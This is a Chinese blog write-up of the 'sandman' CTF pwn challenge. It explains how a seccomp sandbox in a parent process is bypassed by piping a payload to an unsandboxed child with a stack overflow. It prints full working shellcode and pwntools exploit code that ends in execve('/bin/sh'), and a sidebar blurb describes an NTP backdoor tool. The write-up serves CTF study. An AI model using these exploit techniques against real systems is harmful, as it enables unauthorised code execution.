sandman_nc_2016

最新推荐文章于 2025-05-17 15:25:47 发布
最新推荐文章于 2025-05-17 15:25:47 发布
阅读量214 收藏 1
点赞数 1
分类专栏: linux_pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/azraelxuemo/article/details/128034107
版权

非常好的题目

设计到的知识点

seccomp

他再fork之后执行的seccomp,所以可以看到子进程是没有沙箱保护的
在这里插入图片描述
他这里只允许了read 0号系统调用,write 1号系统调用,还有剩下两个是跟error和exit处理有关
在这里插入图片描述
大概的漏洞大家可以看明白,父进程可以执行任意代码,但有沙箱
子进程栈溢出,没沙箱,但是输入是从3pipe创建的描述符输入的,但我们正常是无法使用3描述符的,所以必须要shellcode里面写这部分

pipe

pipe这个函数会返回两个文件描述符,pipedes[0]负责read,pipedes[1]负责write,这里就是3负责read,4负责write,如果我们想要利用shellcode往子进程写内容,最开始我也是想直接read(0,buf,len),write(3,buf,len),但是会失败,我们换成read(0,buf,len),write(4,buf,len)就成功了
在这里插入图片描述

payload

父进程shellcode执行部分

buf=0x602200
ret_addr=buf+0x234
shellcode=f"""
mov rdi,0;
mov rdx,{len(payload)};#payload主要是子进程的shellcode
mov rsi,{buf}
mov rax,0;
syscall;#read(0,buf,len)
mov rdi,{ret_addr}
mov rax,rsp;
sub rax,0x200;
mov qword ptr [rdi],rax#这里就是把最后溢出的ret地址改成栈地址,这里-0x200就是可以根据父进程和子进程大概偏移估算,反正我们也是栈喷
mov rdi,4;
mov rax,1;
syscall;#write(4,buf,len)
start:
nop
jmp start#写个循环防止退出
"""
shellcode=asm(shellcode)
s(p8(len(shellcode)))
sleep(0.5)
s(shellcode)
sleep(0.5)
s(payload)#这里就是子进程的payload
it()

子进程payload

def convert_str_asmencode(content: str):
    out = ""
    for i in content:
        out = hex(ord(i))[2:] + out
    out = "0x" + out
    return out
sh=f"""
mov rax,{convert_str_asmencode("//bin/sh")}#防止有]x00
mov rdx,rsp;
sub dx,0x1008#这个随便往地址写入/bin/sh
mov qword ptr [rdx],rax
add dl,0x8
xor rsi,rsi
mov qword ptr [rdx],rsi;#加上\x00
sub dl,0x8
mov rdi,rdx;
xor rdx,rdx
xor rax,rax
mov al,0x3b
syscall
"""
sh=asm(sh)

payload_final=b"http://"+b"\x90"*(0x228-len(sh))+sh+p64(ret_addr)#这个ret_addr无所谓,反正也要被我们覆盖掉
payload=b"\x0e"+p32(len(payload_final))+payload_final

allpayload

def convert_str_asmencode(content: str):
    out = ""
    for i in content:
        out = hex(ord(i))[2:] + out
    out = "0x" + out
    return out

buf=0x602200
ret_addr=buf+0x234
sh=f"""
mov rax,{convert_str_asmencode("//bin/sh")}
mov rdx,rsp;
sub dx,0x1008
mov qword ptr [rdx],rax
add dl,0x8
xor rsi,rsi
mov qword ptr [rdx],rsi;
sub dl,0x8
mov rdi,rdx;
xor rdx,rdx
xor rax,rax
mov al,0x3b
syscall
"""
sh=asm(sh)

payload_final=b"http://"+b"\x90"*(0x228-len(sh))+sh+p64(ret_addr)
payload=b"\x0e"+p32(len(payload_final))+payload_final
shellcode=f"""
mov rdi,0;
mov rdx,{len(payload)};
mov rsi,{buf}
mov rax,0;
syscall;
mov rdi,{ret_addr}
mov rax,rsp;
sub rax,0x200;
mov qword ptr [rdi],rax
mov rdi,4;
mov rax,1;
syscall;
start:
nop
jmp start
"""
shellcode=asm(shellcode)
s(p8(len(shellcode)))
sleep(0.5)
s(shellcode)
sleep(0.5)
s(payload)
it()

在这里插入图片描述

Python sandman2库报错module ‘time‘ has no attribute ‘clock‘ 或 无法将“sandman2”项识别为 cmdlet、函数、脚本文件或可运行程序的名称
qq_24077201的博客
07-08 413
在Windows环境下安装sandman2 可能会在pip install sanman2后出现 sandman2 : 无法将“sandman2”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。 请检查名称的拼写,如果包括路径,请确保路径正确,然后再试一次 这时候你需要看一下在pip时是否有类似这样的警告 WARNING: The script sandman2ctl.exe is installed in 'C:\Users\xxx\AppData\Roaming\Python\Pyt
Python资源大全
zheng_ruiguo的专栏
03-01 7023
Python资源 Python 3.7.4 文档:https://docs.python.org/zh-cn/3.7/ 快速安装模块:pip3 install PyQt5 -i https://pypi.tuna.tsinghua.edu.cn/simple python开源项目及示例代码:https://www.cnblogs.com/dpf-learn/p/8053043....
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2579
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Sandman:一款基于NTP协议的红队后门研究工具
二狗的博客
02-11 783
1、允许从研究人员控制的服务器获取并执行任意Payload;2、由于网络防火墙系统中通常会允许使用NTP协议,因此可以将其用于安全增强型网络系统中;3、支持通过IP欺骗技术来模拟合法的NTP服务器;对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
更新三转的skills.txt
aixianji9892的博客
01-28 2031
保存在 \tables\skills.txt 下 请注意一定要utf8编码。 1 NV_BASIC 基本技能2 SM_SWORD 单手剑使用熟练度3 SM_TWOHAND 双手剑使用熟练度4 SM_RECOVERY 快速回复5 SM_BASH 狂击6 SM_PROVOKE 挑衅7 SM_MAGNUM 怒爆8 SM_ENDURE 霸体9 MG_SRECOVERY 禅心10 MG_...
zf0 hack
热门推荐
08-26 23万+
  _/_/_/_/_/ 444444444 ~~~~~~ _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~ _/
技术扫盲 软件加壳(转)
weixin_30624825的博客
07-27 356
首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有...
堆栈计算机的原理和实现
Forth语言编程专栏
03-07 2万+
堆栈计算机的原理和实现 原书《 Stack Computers: the new wave 》 (原书封面) 原作者 Philip J. Koopman, Jr. 编译者 赵宇 张文翠 这是第一本讨论新一代堆栈计算机的书,而实现这种体系结构的第一块芯片是 Novix 公司的NC4016芯片。本书作者从堆栈如何被用于计算开始,对过去和现在大约 70 多个堆栈计算机进行分类,并对其中的7个堆栈计算机进
吉他谱_Enter Sandman - Metallica.pdf
09-19
吉他谱 Enter Sandman - Metallica.pdf 提供了Metallica乐队经典曲目Enter Sandman的初级吉他谱教程。这份吉他谱适用于初学者,使用了标记为EBGDAE的六弦吉他标准调弦。歌曲的主音吉他手James Hetfield采用失真吉他...
sandman2:自动为您的旧数据库生成RESTful API服务。 无需代码!
02-04
sandman2从您现有的数据库自动生成RESTful API服务,而无需您编写代码。 只需将sandman2指向您的数据库,添加盐调味,然后sandman2 ,具有超媒体支持的完全RESTful API服务就开始运行,准备接受HTTP请求。 这是一...
Sandman一个为深夜开发者构建的应用程序
08-09
Sandman:为深夜开发者量身打造的智能应用》 在IT行业中,高效的时间管理和良好的作息对于开发者至关重要,特别是那些深夜工作的程序员们。Sandman就是这样一款应用,它以科学的方式帮助开发者规划睡眠,确保他们...
Sandman Mail-开源
05-01
Sandman Mail的核心在于提供用户友好的界面,通过IMAP协议,让用户能够方便地访问和管理他们的电子邮件。IMAP是一种标准的邮件访问协议,允许用户在服务器上存储和检索邮件,而非将其下载到本地设备,这使得用户可以...
深入剖析 Linux 进程的睡眠与唤醒机制
Cheese_Y的博客
05-13 983
Linux 进程的睡眠与唤醒机制是操作系统实现高效资源管理和任务调度的基石。从基本概念到实现机制,再到实际应用与调试,这一机制贯穿于系统运行的各个环节。深入理解并熟练掌握这一机制,不仅有助于优化系统性能,还能在面对进程阻塞、资源争用等问题时快速定位和解决问题。随着 Linux 内核的不断演进,睡眠与唤醒机制也在持续优化,以适应日益复杂的应用场景和硬件环境。以上详细阐述了 Linux 进程睡眠和唤醒的相关内容。若你对其中某部分还想深入了解,或有其他技术方向想探讨,欢迎随时和我说。
Linux笔记】——Linux线程封装
最新发布
GGDxianv的博客
05-17 720
本文介绍了在Linux环境下基于pthread库的线程封装类,旨在简化多线程编程的复杂性。该封装类提供了线程的创建、启动、终止、分离和回收等功能。核心功能包括通过Start()方法创建并启动线程,Stop()方法终止线程,Detach()方法将线程设置为分离状态,以及Join()方法回收线程资源。封装类通过静态成员函数routine和this指针的巧妙结合,解决了线程函数与类成员函数的兼容性问题。源码展示了线程类的实现细节,包括线程ID、状态标志、线程名称和回调函数的封装。该封装类为多线程编程提供了简洁高效
[Linux]系统调用read函数
myloveasuka的博客
05-17 1039
read 函数是 Linux 中常用的系统调用之一,用于从文件或设备读取数据。其基本形式为 ssize_t read(int fd, void *buf, size_t count),其中 fd 是文件描述符,buf 是用户提供的缓冲区,count 是要读取的字节数。
Linux干货(三)
2501_91732643的博客
05-14 882
从B站黑马程序员Linux课程摘选的学习干货,新手友好!若有侵权,会第一时间处理。目录前言1.which find命令1.which命令2.find命令2.grep wc 管道符1.grep命令2.wc命令3.管道符3.echo tail 重定向符1.echo命令2.`反引号符3.重定向符4.tail命令4.vi编译器1.vi/vim编辑器2.基础命令3.运行模式1.命令模式2.输出模式3.底线命令模式。
Linux补充之vscode连接远端主机
lll_666666的博客
05-16 245
Linux补充之vscode如何连接远端主机
Linux】shell内置命令fg,bg和jobs
qq_54177358的博客
05-14 415
​fg(foreground 的缩写)。它用于将​​。svn updateCtrl+Zfg​ bg(background 的缩写)。它用于将​​。​jobs,用于查看和管理当前 Shell 会话中的​​或​​(例如通过Ctrl+Z暂停的任务)jobsbjobs。
tensorflow to_categorical报错
03-16
### TensorFlow 中 `to_categorical` 方法的错误解决方案 在处理 TensorFlow 的 `to_categorical` 报错问题时,通常需要考虑以下几个方面: #### 1. **确认安装版本** 确保已正确安装 TensorFlow 并验证其版本兼容性。如果是在 Windows 上运行环境,则需遵循官方指南完成原生安装[^3]。 #### 2. **导入路径检查** `to_categorical` 函数并非直接属于 TensorFlow 核心模块,而是位于 Keras 工具包下。因此,在调用前应通过如下方式引入: ```python from tensorflow.keras.utils import to_categorical ``` 若未正确指定上述路径可能导致无法识别该方法的情况发生[^1]。 #### 3. **输入数据格式校验** 此函数要求传入的数据类型为整数形式表示类别标签数组。任何非预期类型的参数都会引发异常行为。例如下面演示了一个标准转换过程: ```python import numpy as np y_labels = [0, 1, 2] one_hot_encoded_y = to_categorical(y_labels) print(one_hot_encoded_y) ``` 这里假设原始目标变量存储于列表 `y_labels` 当中;经过编码之后得到独热向量矩阵存放在新变量里以便后续模型训练阶段利用[^2]。 #### 4. **常见错误分析及其修正措施** - 如果遇到类似于“module 'tensorflow' has no attribute 'keras'”的信息提示,这可能是因为所使用的TF版本较旧(比如v1.x系列),而Keras集成到框架内部是从V2开始才有的特性。此时要么升级至最新稳定版,或者单独加载外部库作为替代方案。 - 对于诸如“could not convert string to float”,则表明送进去待处理的目标列存在字符型杂质而非纯粹数值记录。可以先借助 Pandas 数据帧操作清理干净后再执行下一步骤: ```python df['target'] = pd.to_numeric(df['target'], errors='coerce') ``` 以上就是针对 Tensorflow 内部工具类抛出异常现象的一些排查思路总结。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值